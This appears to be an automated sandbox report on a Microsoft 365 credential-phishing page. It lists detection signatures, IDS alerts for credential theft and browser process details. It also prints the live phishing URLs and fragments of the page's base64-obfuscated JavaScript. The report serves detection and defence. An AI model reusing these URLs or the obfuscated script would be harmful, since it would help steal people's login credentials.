Edit tour

Windows Analysis Report
https://52f1897b.5648702dd4d5255cab645104.workers.dev/?qrc=test@test.org

Overview

General Information

Sample URL:	https://52f1897b.5648702dd4d5255cab645104.workers.dev/?qrc=test@test.org
Analysis ID:	1592132
Infos:

Detection

HTMLPhisher

Score:	68
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

AI detected phishing page

Suricata IDS alerts for network traffic

Yara detected HtmlPhish54

AI detected suspicious Javascript

Detected hidden input values containing email addresses (often used in phishing pages)

Detected non-DNS traffic on DNS port

Form action URLs do not match main URL

HTML body contains low number of good links

HTML body contains password input but no form action

HTML page contains hidden javascript code

HTML page contains obfuscated script src

Stores files to the Windows start menu directory

URL contains potential PII (phishing indication)

Classification

Process Tree

System is w10x64

chrome.exe (PID: 6692 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 3856 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1916 --field-trial-handle=2008,i,7632152184494238359,10947971405357003457,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 7152 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://52f1897b.5648702dd4d5255cab645104.workers.dev/?qrc=test@test.org" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Yara Signatures

HTML

Source	Rule	Description	Author	Strings
0.5.id.script.csv	JoeSecurity_HtmlPhish_54	Yara detected HtmlPhish_54	Joe Security
2.2.pages.csv	JoeSecurity_HtmlPhish_54	Yara detected HtmlPhish_54	Joe Security

Suricata Signatures

ET PHISHING Generic Credential Phish Landing Page with Explicit Cloudflare Turnstile Rendering 2024-11-07

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-15T20:05:56.160227+0100	2057301	1	Successful Credential Theft Detected	172.67.208.94	443	192.168.2.5	49718	TCP
2025-01-15T20:05:59.438888+0100	2057301	1	Successful Credential Theft Detected	172.67.208.94	443	192.168.2.5	49717	TCP
2025-01-15T20:06:00.809064+0100	2057301	1	Successful Credential Theft Detected	104.21.42.188	443	192.168.2.5	49729	TCP

Source: https://portal365verf02.top/?63iyxz80f=aHR0cHM6Ly9sb2dpbi5saXZlLmNvbS9vYXV0aDIwX2F1dGhvcml6ZS5zcmY/c2NvcGU9b3BlbmlkK3Byb2ZpbGUrZW1haWwrb2ZmbGluZV9hY2Nlc3MmcmVzcG9uc2VfdHlwZT1jb2RlJmNsaWVudF9pZD01MTQ4MzM0Mi0wODVjLTRkODYtYmY4OC1jZjUwYzcyNTIwNzgmcmVzcG9uc2VfbW9kZT1mb3JtX3Bvc3QmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmbG9naW4ubWljcm9zb2Z0b25saW5lLmNvbSUyZmNvbW1vbiUyZmZlZGVyYXRpb24lMmZvYXV0aDJtc2Emc3RhdGU9clFRSUFSQUFqWkZOYU5OZ0hNYnpObDFjNXo3S1RsNzhJQ2pJTk8yYk5FbWJ3dEN1SDJ2WGJtdlhiZjBRS1cyYXRHbWJ2Rm42OW1NYnUza1FCaks5T1R3SlhnYkMyRWwyMnRXQnNLTU1rWjNHR0NMaVFRZTcyT3JGbXo2SEh3ODhoel9fNTVrZ1dSZnJ2dzNfaUdQNlpLQ3Fzb3lzOU4xZnNzYUhuSmR2UDc3ZmpKbXZ2c1R2M0ozN2ZQcDhHemdLRGEydHVHU2s3NENiVll6TnB0X3RSaTNjUUtqdVFxcXF5YjlETi1vVTNlOEFPQUxnRElBWHRoR3NOUEhEUGx6SXF1ell2S0xINS1VRWtmZDZSZFlEZlJ6bmRYRkZqeXlXaXBCaFZabG5lRW5pR1FuS2tCRjRqNkpDUVM1SmluQnNHNXNQdEhDVjZ3TloycHJ5M2VaUWthVVhUTlRFMi1RbWlPUndJb2dDbFVnZ3lDWndYRGZWYk5wYzlXWGhjalRZRGZHcG9MWU1DNWxPZDFac1YydUphWEZwYW9tUGhNS3JSUzF0aGhiaS1aUWNSalBaYkRxZWtUSlRYQ0tYREt6QUNGcUtoR0M4RnF4aTFKWldLa3BXTHlVdHJtV0lERFE4WVdITjFJem9qRmVPdGRkTWFMRUZidVlCbzFXMUhmS19pdDRqcVY1ak9qSU9TUXFaaXFHVmotemd4QTdPN2NPUTlBOE9Eam1KYThRdDRzSU9YZ18wTmlFLVBmazVPWG9hMkxUeFAyN01YeWNPQjl4UnRXN2s2MWlvS0FzMXE0dDd6NGRpS3B3U205SGFvckdTc2lJU0xIRWRWRTFrY3BNLVA3dEZnUzJLMnFjY2c2U1RvTWxna2oyandEY0tQTDFDN0R2LU5lclJWYkE3REk2SC1TRktiaFExdlRrLXNVNXI1UUpHZGNXZ19ldDBWMjhXWkxudjJzVkdTMm5TX2tkMDd3VDllR05qNDJDRXVCZzllUG5tMmVYZWg2X1I4N0g3S2RVb3I4SjdjQzYxTE15Mk9zRndmbEhDM2xrelVWYmpZVk9manVWUnNxNG5wck9sM09TdWt6aHhFcjhBMCZsb2dpbl9oaW50PXRlc3QlNDB0ZXN0Lm9yZyZlc3RzZmVkPTEmdWFpZD1jOWQ4YWRmYjQ5OGI5YzcwZWM0YjI1Mjg0ZWRlZTY5MSZjb2JyYW5kaWQ9ZGViM2Y3NGEtZWQ1Yi00ZWYxLThkM2MtOTJiODVkZDQ3MzUyJmZjaT0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAj

Joe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'., The URL 'portal365verf02.top' does not match the legitimate domain name for Microsoft., The domain uses a '.top' extension, which is unusual for a well-known brand like Microsoft., The URL contains suspicious elements such as '365' and 'verf02', which could be attempts to mimic Microsoft's Office 365 services., The presence of an input field for 'Enter password' is a common tactic used in phishing sites to capture sensitive information. DOM: 3.3.pages.csv

Yara detected HtmlPhish54

Source: Yara match	File source: 0.5.id.script.csv, type: HTML
Source: Yara match	File source: 2.2.pages.csv, type: HTML

AI detected suspicious Javascript

Source: 0.14.id.script.csv

Joe Sandbox AI: Detected suspicious JavaScript with source url: https://portal365verf02.top/?63iyxz80f=aHR0cHM6Ly9... This script demonstrates high-risk behavior. It attempts to redirect the user to a different domain, which could be a sign of a phishing or malicious attempt. Additionally, the use of `document.write()` with obfuscated HTML suggests the potential for injecting malicious content into the page. These behaviors are indicative of a high-risk script that should be further investigated.

HTTP Parser: test@test.org

Source: https://portal365verf02.top/?63iyxz80f=aHR0cHM6Ly9sb2dpbi5saXZlLmNvbS9vYXV0aDIwX2F1dGhvcml6ZS5zcmY/c2NvcGU9b3BlbmlkK3Byb2ZpbGUrZW1haWwrb2ZmbGluZV9hY2Nlc3MmcmVzcG9uc2VfdHlwZT1jb2RlJmNsaWVudF9pZD01MTQ4MzM0Mi0wODVjLTRkODYtYmY4OC1jZjUwYzcyNTIwNzgmcmVzcG9uc2VfbW9kZT1mb3JtX3Bvc3QmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmbG9naW4ubWljcm9zb2Z0b25saW5lLmNvbSUyZmNvbW1vbiUyZmZlZGVyYXRpb24lMmZvYXV0aDJtc2Emc3RhdGU9clFRSUFSQUFqWkZOYU5OZ0hNYnpObDFjNXo3S1RsNzhJQ2pJTk8yYk5FbWJ3dEN1SDJ2WGJtdlhiZjBRS1cyYXRHbWJ2Rm42OW1NYnUza1FCaks5T1R3SlhnYkMyRWwyMnRXQnNLTU1rWjNHR0NMaVFRZTcyT3JGbXo2SEh3ODhoel9fNTVrZ1dSZnJ2dzNfaUdQNlpLQ3Fzb3lzOU4xZnNzYUhuSmR2UDc3ZmpKbXZ2c1R2M0ozN2ZQcDhHemdLRGEydHVHU2s3NENiVll6TnB0X3RSaTNjUUtqdVFxcXF5YjlETi1vVTNlOEFPQUxnRElBWHRoR3NOUEhEUGx6SXF1ell2S0xINS1VRWtmZDZSZFlEZlJ6bmRYRkZqeXlXaXBCaFZabG5lRW5pR1FuS2tCRjRqNkpDUVM1SmluQnNHNXNQdEhDVjZ3TloycHJ5M2VaUWthVVhUTlRFMi1RbWlPUndJb2dDbFVnZ3lDWndYRGZWYk5wYzlXWGhjalRZRGZHcG9MWU1DNWxPZDFac1YydUphWEZwYW9tUGhNS3JSUzF0aGhiaS1aUWNSalBaYkRxZWtUSlRYQ0tYREt6QUNGcUtoR0M4RnF4aTFKWldLa3BXT...	HTTP Parser: Form action: https://login.live.com/ppsecure/post.srf?client_id=51483342-085c-4d86-bf88-cf50c7252078&cobrandid=deb3f74a-ed5b-4ef1-8d3c-92b85dd47352&contextid=6334FF2BED3296D5&opid=EE1291114D3F8478&bk=1736967981&uaid=c9d8adfb498b9c70ec4b25284edee691&pid=15216 portal365verf02 live
Source: https://portal365verf02.top/?63iyxz80f=aHR0cHM6Ly9sb2dpbi5saXZlLmNvbS9vYXV0aDIwX2F1dGhvcml6ZS5zcmY/c2NvcGU9b3BlbmlkK3Byb2ZpbGUrZW1haWwrb2ZmbGluZV9hY2Nlc3MmcmVzcG9uc2VfdHlwZT1jb2RlJmNsaWVudF9pZD01MTQ4MzM0Mi0wODVjLTRkODYtYmY4OC1jZjUwYzcyNTIwNzgmcmVzcG9uc2VfbW9kZT1mb3JtX3Bvc3QmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmbG9naW4ubWljcm9zb2Z0b25saW5lLmNvbSUyZmNvbW1vbiUyZmZlZGVyYXRpb24lMmZvYXV0aDJtc2Emc3RhdGU9clFRSUFSQUFqWkZOYU5OZ0hNYnpObDFjNXo3S1RsNzhJQ2pJTk8yYk5FbWJ3dEN1SDJ2WGJtdlhiZjBRS1cyYXRHbWJ2Rm42OW1NYnUza1FCaks5T1R3SlhnYkMyRWwyMnRXQnNLTU1rWjNHR0NMaVFRZTcyT3JGbXo2SEh3ODhoel9fNTVrZ1dSZnJ2dzNfaUdQNlpLQ3Fzb3lzOU4xZnNzYUhuSmR2UDc3ZmpKbXZ2c1R2M0ozN2ZQcDhHemdLRGEydHVHU2s3NENiVll6TnB0X3RSaTNjUUtqdVFxcXF5YjlETi1vVTNlOEFPQUxnRElBWHRoR3NOUEhEUGx6SXF1ell2S0xINS1VRWtmZDZSZFlEZlJ6bmRYRkZqeXlXaXBCaFZabG5lRW5pR1FuS2tCRjRqNkpDUVM1SmluQnNHNXNQdEhDVjZ3TloycHJ5M2VaUWthVVhUTlRFMi1RbWlPUndJb2dDbFVnZ3lDWndYRGZWYk5wYzlXWGhjalRZRGZHcG9MWU1DNWxPZDFac1YydUphWEZwYW9tUGhNS3JSUzF0aGhiaS1aUWNSalBaYkRxZWtUSlRYQ0tYREt6QUNGcUtoR0M4RnF4aTFKWldLa3BXT...	HTTP Parser: Form action: https://login.live.com/ppsecure/post.srf?client_id=51483342-085c-4d86-bf88-cf50c7252078&cobrandid=deb3f74a-ed5b-4ef1-8d3c-92b85dd47352&contextid=6334FF2BED3296D5&opid=EE1291114D3F8478&bk=1736967981&uaid=c9d8adfb498b9c70ec4b25284edee691&pid=15216 portal365verf02 live

HTTP Parser: Number of links: 0

HTTP Parser: <input type="password" .../> found but no <form action="...

Source: https://portal365verf02.top/?63iyxz80f=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD10ZXN0JTQwdGVzdC5vcmcmY2xpZW50LXJlcXVlc3QtaWQ9YzlkOGFkZmItNDk4Yi05YzcwLWVjNGItMjUyODRlZGVlNjkxJnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODcyNTY0Nzc2MTMwODIyNy4yYTNjNmJhMC0xZmM0LTQ5OTQtOTBjMC01NDNlZjA1Y2I5ZTUmc3RhdGU9Rll0TENvQWdGQUMxTHRLbXBmWFNweThYMFZIQ3hENFFDaVYwX1d3eE02dmhqTEc2VUJVNEZERXlhaVNwRFJLWlFjRW9KWFhTS1c5V0IyTFlQQXEwRm9VRkQwS2pDaHRvdjlxZ2VYbWJQcjJ1bjYtMG4zRTV6cGluSEo3Y0l2enAwcjFf

HTTP Parser: Base64 decoded: function c(){if(!document.querySelector(".b") || !document.querySelector(".g")){document.head.appendChild(Object.assign(document.createElement("div"),{classList:["b"]}));document.documentElement.style.filter="hue-rotate(4deg)";document.head.appendChild(Ob...

Source: https://portal365verf02.top/?63iyxz80f=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJ	HTTP Parser: Script src: data:text/javascript;base64,ZnVuY3Rpb24gYygpe2lmKCFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuYiIpIHx8ICFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuZyIpKXtkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKE9iamVjdC5hc3NpZ24oZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgiZGl2Iikse2NsYXNzTGlzdDpbImIiXX
Source: https://portal365verf02.top/?63iyxz80f=aHR0cHM6Ly9sb2dpbi5saXZlLmNvbS9vYXV0aDIwX2F1dGhvcml6ZS5zcmY/c2NvcGU9b3BlbmlkK3Byb2ZpbGUrZW1haWwrb2ZmbGluZV9hY2Nlc3MmcmVzcG9uc2VfdHlwZT1jb2RlJmNsaWVudF9pZD01MTQ4MzM0Mi0wODVjLTRkODYtYmY4OC1jZjUwYzcyNTIwNzgmcmVzcG9	HTTP Parser: Script src: data:text/javascript;base64,ZnVuY3Rpb24gYygpe2lmKCFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuYiIpIHx8ICFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuZyIpKXtkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKE9iamVjdC5hc3NpZ24oZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgiZGl2Iikse2NsYXNzTGlzdDpbImIiXX
Source: https://portal365verf02.top/?63iyxz80f=aHR0cHM6Ly9sb2dpbi5saXZlLmNvbS9vYXV0aDIwX2F1dGhvcml6ZS5zcmY/c2NvcGU9b3BlbmlkK3Byb2ZpbGUrZW1haWwrb2ZmbGluZV9hY2Nlc3MmcmVzcG9uc2VfdHlwZT1jb2RlJmNsaWVudF9pZD01MTQ4MzM0Mi0wODVjLTRkODYtYmY4OC1jZjUwYzcyNTIwNzgmcmVzcG9	HTTP Parser: Script src: data:text/javascript;base64,ZnVuY3Rpb24gYygpe2lmKCFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuYiIpIHx8ICFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuZyIpKXtkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKE9iamVjdC5hc3NpZ24oZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgiZGl2Iikse2NsYXNzTGlzdDpbImIiXX

Source: https://52f1897b.5648702dd4d5255cab645104.workers.dev/?qrc=test@test.org

Sample URL: PII: test@test.org

Source: https://portal365verf02.top/?63iyxz80f=aHR0cHM6Ly9sb2dpbi5saXZlLmNvbS9vYXV0aDIwX2F1dGhvcml6ZS5zcmY/c2NvcGU9b3BlbmlkK3Byb2ZpbGUrZW1haWwrb2ZmbGluZV9hY2Nlc3MmcmVzcG9uc2VfdHlwZT1jb2RlJmNsaWVudF9pZD01MTQ4MzM0Mi0wODVjLTRkODYtYmY4OC1jZjUwYzcyNTIwNzgmcmVzcG9uc2VfbW9kZT1mb3JtX3Bvc3QmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmbG9naW4ubWljcm9zb2Z0b25saW5lLmNvbSUyZmNvbW1vbiUyZmZlZGVyYXRpb24lMmZvYXV0aDJtc2Emc3RhdGU9clFRSUFSQUFqWkZOYU5OZ0hNYnpObDFjNXo3S1RsNzhJQ2pJTk8yYk5FbWJ3dEN1SDJ2WGJtdlhiZjBRS1cyYXRHbWJ2Rm42OW1NYnUza1FCaks5T1R3SlhnYkMyRWwyMnRXQnNLTU1rWjNHR0NMaVFRZTcyT3JGbXo2SEh3ODhoel9fNTVrZ1dSZnJ2dzNfaUdQNlpLQ3Fzb3lzOU4xZnNzYUhuSmR2UDc3ZmpKbXZ2c1R2M0ozN2ZQcDhHemdLRGEydHVHU2s3NENiVll6TnB0X3RSaTNjUUtqdVFxcXF5YjlETi1vVTNlOEFPQUxnRElBWHRoR3NOUEhEUGx6SXF1ell2S0xINS1VRWtmZDZSZFlEZlJ6bmRYRkZqeXlXaXBCaFZabG5lRW5pR1FuS2tCRjRqNkpDUVM1SmluQnNHNXNQdEhDVjZ3TloycHJ5M2VaUWthVVhUTlRFMi1RbWlPUndJb2dDbFVnZ3lDWndYRGZWYk5wYzlXWGhjalRZRGZHcG9MWU1DNWxPZDFac1YydUphWEZwYW9tUGhNS3JSUzF0aGhiaS1aUWNSalBaYkRxZWtUSlRYQ0tYREt6QUNGcUtoR0M4RnF4aTFKWldLa3BXT...	HTTP Parser: Iframe src: https://fpt.live.com?session_id=c9d8adfb498b9c70ec4b25284edee691&CustomerId=33e01921-4d64-4f8c-a055-5bdaffd5e33d&PageId=SI
Source: https://portal365verf02.top/?63iyxz80f=aHR0cHM6Ly9sb2dpbi5saXZlLmNvbS9vYXV0aDIwX2F1dGhvcml6ZS5zcmY/c2NvcGU9b3BlbmlkK3Byb2ZpbGUrZW1haWwrb2ZmbGluZV9hY2Nlc3MmcmVzcG9uc2VfdHlwZT1jb2RlJmNsaWVudF9pZD01MTQ4MzM0Mi0wODVjLTRkODYtYmY4OC1jZjUwYzcyNTIwNzgmcmVzcG9uc2VfbW9kZT1mb3JtX3Bvc3QmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmbG9naW4ubWljcm9zb2Z0b25saW5lLmNvbSUyZmNvbW1vbiUyZmZlZGVyYXRpb24lMmZvYXV0aDJtc2Emc3RhdGU9clFRSUFSQUFqWkZOYU5OZ0hNYnpObDFjNXo3S1RsNzhJQ2pJTk8yYk5FbWJ3dEN1SDJ2WGJtdlhiZjBRS1cyYXRHbWJ2Rm42OW1NYnUza1FCaks5T1R3SlhnYkMyRWwyMnRXQnNLTU1rWjNHR0NMaVFRZTcyT3JGbXo2SEh3ODhoel9fNTVrZ1dSZnJ2dzNfaUdQNlpLQ3Fzb3lzOU4xZnNzYUhuSmR2UDc3ZmpKbXZ2c1R2M0ozN2ZQcDhHemdLRGEydHVHU2s3NENiVll6TnB0X3RSaTNjUUtqdVFxcXF5YjlETi1vVTNlOEFPQUxnRElBWHRoR3NOUEhEUGx6SXF1ell2S0xINS1VRWtmZDZSZFlEZlJ6bmRYRkZqeXlXaXBCaFZabG5lRW5pR1FuS2tCRjRqNkpDUVM1SmluQnNHNXNQdEhDVjZ3TloycHJ5M2VaUWthVVhUTlRFMi1RbWlPUndJb2dDbFVnZ3lDWndYRGZWYk5wYzlXWGhjalRZRGZHcG9MWU1DNWxPZDFac1YydUphWEZwYW9tUGhNS3JSUzF0aGhiaS1aUWNSalBaYkRxZWtUSlRYQ0tYREt6QUNGcUtoR0M4RnF4aTFKWldLa3BXT...	HTTP Parser: Iframe src: https://fpt.live.com?session_id=c9d8adfb498b9c70ec4b25284edee691&CustomerId=33e01921-4d64-4f8c-a055-5bdaffd5e33d&PageId=SI

HTTP Parser: <input type="password" .../> found

Source: https://52f1897b.5648702dd4d5255cab645104.workers.dev/?qrc=test@test.org	HTTP Parser: No favicon
Source: https://portal365verf02.top/?63iyxz80f=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD10ZXN0JTQwdGVzdC5vcmcmY2xpZW50LXJlcXVlc3QtaWQ9YzlkOGFkZmItNDk4Yi05YzcwLWVjNGItMjUyODRlZGVlNjkxJnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODcyNTY0Nzc2MTMwODIyNy4yYTNjNmJhMC0xZmM0LTQ5OTQtOTBjMC01NDNlZjA1Y2I5ZTUmc3RhdGU9Rll0TENvQWdGQUMxTHRLbXBmWFNweThYMFZIQ3hENFFDaVYwX1d3eE02dmhqTEc2VUJVNEZERXlhaVNwRFJLWlFjRW9KWFhTS1c5V0IyTFlQQXEwRm9VRkQwS2pDaHRvdjlxZ2VYbWJQcjJ1bjYtMG4zRTV6cGluSEo3Y0l2enAwcjFf	HTTP Parser: No favicon
Source: https://portal365verf02.top/?63iyxz80f=aHR0cHM6Ly9sb2dpbi5saXZlLmNvbS9vYXV0aDIwX2F1dGhvcml6ZS5zcmY/c2NvcGU9b3BlbmlkK3Byb2ZpbGUrZW1haWwrb2ZmbGluZV9hY2Nlc3MmcmVzcG9uc2VfdHlwZT1jb2RlJmNsaWVudF9pZD01MTQ4MzM0Mi0wODVjLTRkODYtYmY4OC1jZjUwYzcyNTIwNzgmcmVzcG9uc2VfbW9kZT1mb3JtX3Bvc3QmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmbG9naW4ubWljcm9zb2Z0b25saW5lLmNvbSUyZmNvbW1vbiUyZmZlZGVyYXRpb24lMmZvYXV0aDJtc2Emc3RhdGU9clFRSUFSQUFqWkZOYU5OZ0hNYnpObDFjNXo3S1RsNzhJQ2pJTk8yYk5FbWJ3dEN1SDJ2WGJtdlhiZjBRS1cyYXRHbWJ2Rm42OW1NYnUza1FCaks5T1R3SlhnYkMyRWwyMnRXQnNLTU1rWjNHR0NMaVFRZTcyT3JGbXo2SEh3ODhoel9fNTVrZ1dSZnJ2dzNfaUdQNlpLQ3Fzb3lzOU4xZnNzYUhuSmR2UDc3ZmpKbXZ2c1R2M0ozN2ZQcDhHemdLRGEydHVHU2s3NENiVll6TnB0X3RSaTNjUUtqdVFxcXF5YjlETi1vVTNlOEFPQUxnRElBWHRoR3NOUEhEUGx6SXF1ell2S0xINS1VRWtmZDZSZFlEZlJ6bmRYRkZqeXlXaXBCaFZabG5lRW5pR1FuS2tCRjRqNkpDUVM1SmluQnNHNXNQdEhDVjZ3TloycHJ5M2VaUWthVVhUTlRFMi1RbWlPUndJb2dDbFVnZ3lDWndYRGZWYk5wYzlXWGhjalRZRGZHcG9MWU1DNWxPZDFac1YydUphWEZwYW9tUGhNS3JSUzF0aGhiaS1aUWNSalBaYkRxZWtUSlRYQ0tYREt6QUNGcUtoR0M4RnF4aTFKWldLa3BXT...	HTTP Parser: No favicon
Source: https://portal365verf02.top/?63iyxz80f=aHR0cHM6Ly9sb2dpbi5saXZlLmNvbS9vYXV0aDIwX2F1dGhvcml6ZS5zcmY/c2NvcGU9b3BlbmlkK3Byb2ZpbGUrZW1haWwrb2ZmbGluZV9hY2Nlc3MmcmVzcG9uc2VfdHlwZT1jb2RlJmNsaWVudF9pZD01MTQ4MzM0Mi0wODVjLTRkODYtYmY4OC1jZjUwYzcyNTIwNzgmcmVzcG9uc2VfbW9kZT1mb3JtX3Bvc3QmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmbG9naW4ubWljcm9zb2Z0b25saW5lLmNvbSUyZmNvbW1vbiUyZmZlZGVyYXRpb24lMmZvYXV0aDJtc2Emc3RhdGU9clFRSUFSQUFqWkZOYU5OZ0hNYnpObDFjNXo3S1RsNzhJQ2pJTk8yYk5FbWJ3dEN1SDJ2WGJtdlhiZjBRS1cyYXRHbWJ2Rm42OW1NYnUza1FCaks5T1R3SlhnYkMyRWwyMnRXQnNLTU1rWjNHR0NMaVFRZTcyT3JGbXo2SEh3ODhoel9fNTVrZ1dSZnJ2dzNfaUdQNlpLQ3Fzb3lzOU4xZnNzYUhuSmR2UDc3ZmpKbXZ2c1R2M0ozN2ZQcDhHemdLRGEydHVHU2s3NENiVll6TnB0X3RSaTNjUUtqdVFxcXF5YjlETi1vVTNlOEFPQUxnRElBWHRoR3NOUEhEUGx6SXF1ell2S0xINS1VRWtmZDZSZFlEZlJ6bmRYRkZqeXlXaXBCaFZabG5lRW5pR1FuS2tCRjRqNkpDUVM1SmluQnNHNXNQdEhDVjZ3TloycHJ5M2VaUWthVVhUTlRFMi1RbWlPUndJb2dDbFVnZ3lDWndYRGZWYk5wYzlXWGhjalRZRGZHcG9MWU1DNWxPZDFac1YydUphWEZwYW9tUGhNS3JSUzF0aGhiaS1aUWNSalBaYkRxZWtUSlRYQ0tYREt6QUNGcUtoR0M4RnF4aTFKWldLa3BXT...	HTTP Parser: No favicon
Source: https://portal365verf02.top/?63iyxz80f=aHR0cHM6Ly9sb2dpbi5saXZlLmNvbS9vYXV0aDIwX2F1dGhvcml6ZS5zcmY/c2NvcGU9b3BlbmlkK3Byb2ZpbGUrZW1haWwrb2ZmbGluZV9hY2Nlc3MmcmVzcG9uc2VfdHlwZT1jb2RlJmNsaWVudF9pZD01MTQ4MzM0Mi0wODVjLTRkODYtYmY4OC1jZjUwYzcyNTIwNzgmcmVzcG9uc2VfbW9kZT1mb3JtX3Bvc3QmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmbG9naW4ubWljcm9zb2Z0b25saW5lLmNvbSUyZmNvbW1vbiUyZmZlZGVyYXRpb24lMmZvYXV0aDJtc2Emc3RhdGU9clFRSUFSQUFqWkZOYU5OZ0hNYnpObDFjNXo3S1RsNzhJQ2pJTk8yYk5FbWJ3dEN1SDJ2WGJtdlhiZjBRS1cyYXRHbWJ2Rm42OW1NYnUza1FCaks5T1R3SlhnYkMyRWwyMnRXQnNLTU1rWjNHR0NMaVFRZTcyT3JGbXo2SEh3ODhoel9fNTVrZ1dSZnJ2dzNfaUdQNlpLQ3Fzb3lzOU4xZnNzYUhuSmR2UDc3ZmpKbXZ2c1R2M0ozN2ZQcDhHemdLRGEydHVHU2s3NENiVll6TnB0X3RSaTNjUUtqdVFxcXF5YjlETi1vVTNlOEFPQUxnRElBWHRoR3NOUEhEUGx6SXF1ell2S0xINS1VRWtmZDZSZFlEZlJ6bmRYRkZqeXlXaXBCaFZabG5lRW5pR1FuS2tCRjRqNkpDUVM1SmluQnNHNXNQdEhDVjZ3TloycHJ5M2VaUWthVVhUTlRFMi1RbWlPUndJb2dDbFVnZ3lDWndYRGZWYk5wYzlXWGhjalRZRGZHcG9MWU1DNWxPZDFac1YydUphWEZwYW9tUGhNS3JSUzF0aGhiaS1aUWNSalBaYkRxZWtUSlRYQ0tYREt6QUNGcUtoR0M4RnF4aTFKWldLa3BXT...	HTTP Parser: No favicon
Source: https://login.live.com/ppsecure/post.srf?client_id=51483342-085c-4d86-bf88-cf50c7252078&cobrandid=deb3f74a-ed5b-4ef1-8d3c-92b85dd47352&contextid=6334FF2BED3296D5&opid=EE1291114D3F8478&bk=1736967981&uaid=c9d8adfb498b9c70ec4b25284edee691&pid=15216	HTTP Parser: No favicon

